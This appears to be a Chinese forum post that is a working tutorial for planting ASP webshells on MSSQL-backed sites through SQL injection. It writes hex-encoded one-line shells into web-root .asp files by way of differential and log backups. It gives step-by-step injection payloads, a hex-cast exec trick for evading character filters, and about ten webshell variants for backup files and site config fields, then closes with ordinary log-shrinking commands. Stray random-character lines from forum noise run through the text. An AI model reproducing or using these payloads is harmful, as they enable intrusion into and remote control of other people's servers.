MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

- [- _; l1 F6 c0 `( D2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
3 H* p5 u7 D' h: R: o+ e# h
/ @, Y9 X/ ?( n4 q  ^# U上面
8 g/ _3 i, [) X0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
! t1 Y' k2 S; x# F# H3 X# {! E# b
create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
: M$ R7 ~0 @9 q" v5 U3 n' k& u
0 o3 t8 a; \9 ]! Y+ U3 ]2 A
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

1 N+ z( Y% _' S% ldeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

9 @$ U! `7 Q  y3 J  h. r; qdrop table [xiaolu]  -- 删除此表。
0 W) z% ?$ v; k
0x77006F006B0061006F002E00620061006B00为wokao.bak
2 j0 t$ O5 w4 y9 X0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
5 S6 v( V  U% Q7 t3 C0 x2 z, @' x0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

) @/ i% d9 |, ^( r5 |/ {声明：方法不是我想的，我只是写工具，默认得到shell是
  w5 x  b- b+ T) L<%execute(request("a"))%>
$ n/ Z0 e7 v4 _/ h; Y& }9 y) M1 d===============================================================

我发现上面代码，有时会无效，而直接用
4 `6 H1 @, k& S$ e" I' v: |- o
backup database 库名 to disk = 'c:\ddd.bak'
( F7 \5 F6 r0 u9 [0 w) k
0 J: n  [$ p  {" B4 b; ^2 `: Qcreate table [dbo].[dtest] ([cmd] [image]);

9 g2 u% C$ T0 R# G/ v6 o% K5 yinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
) i3 O  F7 w. [6 l2 U1 L
; `  Y$ C# U' g% A  t) Y0 D9 kbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

1 \/ G: I4 g$ K. s却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
/ T: m# ~* L. w5 E
网上还有log增量备份的，我也把他记录一下
/ B& B: B/ h! P1 d=====================================================
另一种log增量备份技术:
5 z4 a1 v0 `2 C
';alter database null set RECOVERY FULL--
1 g1 c, I7 Y" ~& e0 v1 B
7 F  v+ O0 a7 y& X6 H" D* i';create table cmd (a image)--

* \7 C& C* g, |0 ]';backup log null to disk = 'f:\cmd' with init--
8 D: k& v; T# y0 x, G
4 g. ~4 w& \# c2 R';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--

) |8 A) O/ {0 d';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--

' M) u" w' a, BPS:0x3C2565786563757465287265717565737428226122292
- Q& w; D  X8 S$ p" W+ {8 B9253EDA 是一句话小马16进制转来的
+ Y, I4 f# R( q, a3 Y( N/ P  T0 g
4 v' ?) n% `  n/ F! A7 `* X说到一句话马，还可以有这么几种写法：
* p6 [) s1 W$ h- H8 V3 r
/ M5 V: M1 H# O5 M9 Ha)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
+ U& L& C" R- Q( \$ [6 mc)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
! k! F( u/ W, F" ^4 Q+ \f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
9 I9 k" W, @7 R# ]/ u8 n5 Z3 fh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

=============================================
# T1 ~  [* o  c( R0 p+ i
3 A3 `: {' W" [6 m* f; w  g当遇到差备过滤了/时用这个语句代替

* j& O) j( T! G4 I, Ddeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
$ Q4 v8 f, Q$ F% d" R8 A& Q# f
把要执行的语句转16进制然后用exec执行

  ^+ w5 m5 f8 E. l; o; k1 F
减少备份文件大小方法如下:
; s* i, ]7 ]: `7 s9 f0 y
) }% x1 m6 Z; w9 o总的来说就是那么简单几句,下面以备份数据库model为例子
1
% L5 Z2 Z  p5 A, a0 _$ N% L/ Q; ^id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
: L0 G4 R+ c  M2
0 W4 K* }$ N# u; d! g" A/ }: Hid=1;backup database model to disk='你的路径‘ with differential,format;--
: T- ]  F, E# J


SQL语句清理日志
: k. r2 n8 \8 o7 J) ~2 d' r注：test为数据库名
. y& A! M" {& m# [5 ^" f! v
--清空日志
DUMP TRANSACTION test WITH NO_LOG
' }% ~6 F6 J- r# S
( [, T4 S1 `! r" O/ O) z* w--截断事务日志
' P  h  a! y. L, P2 P7 J! ?$ dBACKUP LOG test WITH NO_LOG
: X, r/ t4 g: W6 }0 `  K
9 [! V. p; D+ w. b, D2 k8 E--收缩数据库
DBCC SHRINKDATABASE(test)

6 B, h8 M4 k: z0 t4 L--收缩指定数据文件,1是文件号,可以通过这个语句查询到
0 P' _6 ?4 [9 }$ n  ISelect * from sysfiles DBCC SHRINKFILE(1)
; \. I0 Z" W- W
3 m  i% r3 J4 K: b# y- n, L0 R--以后能自动收缩
4 k9 R( H( s5 ^3 K4 Y& u  G- \EXEC sp_dboption 'test', 'autoshrink', 'TRUE'